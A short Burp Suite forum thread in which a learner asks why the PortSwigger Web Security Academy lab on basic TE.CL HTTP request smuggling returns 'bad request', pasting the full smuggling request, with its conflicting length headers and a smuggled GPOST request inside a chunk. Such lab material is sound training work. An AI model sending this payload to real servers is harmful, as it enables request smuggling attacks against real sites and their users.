Burp Suite User Forum

HTTP request smuggling, basic TE.CL vulnerability

Ashish | Last updated: May 19, 2020 12:53PM UTC

i did the lab as mentioned in the solution but when i submit the request in repeater it says "bad request" followimg is the reuest i sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 and also tried adding \r\n\r\n after the zero.

Michelle, PortSwigger Agent | Last updated: May 20, 2020 11:37AM UTC

We're taking a look into this, could you send us a copy of the request you used with the \r\n\r\n added, please?

Ashish | Last updated: May 20, 2020 01:02PM UTC

it worked today for me i just did it same way but without writing those \r\n\r\n after zero don't know what was the error,

You need to Log in to post a reply. Or register here, for free.